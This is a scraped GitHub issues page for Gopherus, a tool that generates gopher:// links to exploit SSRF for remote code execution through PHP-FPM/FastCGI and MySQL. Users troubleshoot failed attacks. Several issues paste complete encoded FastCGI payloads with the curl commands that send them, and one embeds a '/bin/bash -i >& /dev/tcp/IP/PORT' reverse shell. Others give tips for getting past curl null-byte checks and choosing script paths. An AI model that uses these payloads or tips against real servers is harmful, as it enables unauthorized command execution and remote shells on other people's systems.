tarunkant / gopherus Goto Github PK
View Code? Open in Web Editor NEWThis tool generates gopher link for exploiting SSRF and gaining RCE in various servers
License: MIT License
This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
License: MIT License
Hi,
I've been testing the fastcgi exploit in a local VM but unable to get it to to work.
PHP-FPM is listening on port 9000
[vagrant@localhost ~]$ netstat -tunapl | grep 9000
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:56488 127.0.0.1:9000 TIME_WAIT -
[vagrant@localhost ~]$ sudo grep -ri listen /etc/php-fpm.d/www.conf
; - 'listen' (unixsocket)
; 'ip.add.re.ss:port' - to listen on a TCP socket to a specific address on
; 'port' - to listen on a TCP socket to all addresses on a
; '/path/to/unix/socket' - to listen on a unix socket.
listen = 127.0.0.1:9000
; Set listen(2) backlog.
;listen.backlog = 128
;listen.owner = nobody
listen.owner = apache
;listen.group = nobody
listen.group = apache
listen.mode = 0660
; PHP FCGI (5.2.2+). Makes sense only with a tcp listening socket. Each address
listen.allowed_clients = 127.0.0.1
; listen queue - the number of request in the queue of pending
; connections (see backlog in listen(2));
; max listen queue - the maximum number of requests in the queue
; listen queue len - the size of the socket queue of pending connections;
; listen queue: 0
; max listen queue: 1
; listen queue len: 42
I've generated the payload an executed as follows
[vagrant@localhost Gopherus]$ pwd
/home/vagrant/Gopherus
[vagrant@localhost Gopherus]$ cat index.php
<?php
echo 'HELLO WORLD' . PHP_EOL;
[vagrant@localhost Gopherus]$ gopherus --exploit fastcgi
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one: /home/vagrant/Gopherus/index.php
Terminal command to run: ls
Your gopher link is ready to do SSRF:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
-----------Made-by-SpyD3r-----------
[vagrant@localhost Gopherus]$ curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
* About to connect() to 127.0.0.1 port 9000 (#0)
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)
curl just hangs until I eventually send it a SIGINT.
Any help would be much appreciated.
Hi,๐๐
I'm student in Repulic of Korea.
I'm study about cyber security.
Thanks to the tool you made recently, I solved one CTF problem well.๐๐
But there are some problems with the shell code you made(a.k.a install.sh).
If you look at the picture below, you can see an error.
The server I am currently using is Ubuntu 20.04.
If you look at the picture below, pip2 is not supported in that environment.
Operating systems and tools are updated every year.
Accordingly, it seems that the code needs to be modified.
A php website vunerable to SSRF using the curl_setopt() function to load files will throw this error due to the null byte in the generated url when using the payload url generated by exploit MySql and exploit FastCGI
PHP Fatal error: Uncaught ValueError: curl_setopt(): cURL option must not contain any null bytes
making the attack void
please replace
"\r\n " to "\r\n"
If need, got that https://pastebin.com/raw/Va3CH3tK
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/tools.html#Gopherus
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.
The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make the project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care.
There's a good chance of finding phar files in standard locations according to their installation guides.
E.g.
Currently I get error below when trying to use with /usr/local/bin/composer
curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
_Access to the script '/usr/local/bin/composer' has been denied (see security.limit_extensions)
jStatus: 403 Forbidden
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8
Access denied.
5 G%
File "/home/sajeesh/Gopherus/gopherus.py", line 28
print colors.green + """
^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
I use gopherus --exploit fastcgi
to get RCE which execute /bin/bash -i >& /dev/tcp/IP/PORT 0>&1
.
Result gopher://127.0.0.1:9001/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH102%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00f%04%00%3C%3Fphp%20system%28%27/bin/bash%20-i%20%3E%26%20/dev/tcp/IP/PORT%200%3E%261%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
I expect having a reverse shell when running curl ABOVE_GOPHER_LINK
, but nothing happens instead.
Can anyone explain for me, please?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.